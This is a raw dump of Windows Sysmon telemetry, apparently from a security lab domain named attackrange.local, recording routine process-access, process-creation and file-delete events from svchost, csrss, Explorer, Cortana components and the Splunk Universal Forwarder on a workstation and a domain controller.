07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E00B404D86AA56F511649316B9BA5CB,SHA256=55121FFE55147D2FA324C96CE8C9090F571AC113613C68706794EC68815C07EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=175C9FA0BF0ADBB0A96DEA26772075A9,SHA256=A6BFF3E7AA6793127A0CB5C45288A673BAF666B56675981477EBF496BDA0BF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415D2AEE35BC45F43BB32D411C8F6642,SHA256=D9E05D412AA50424002D4B1A2039C43AE2ECB830A919E8C7E7BD44918918756F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=603B669F8B5D0F3495C84BA176BEB9FB,SHA256=12863C6358CAD76ED8BA15BEE0D34C2AC532DA3147C98AF0A25850B35A8BC3AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.642{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.642{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.642{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.627{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.611{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 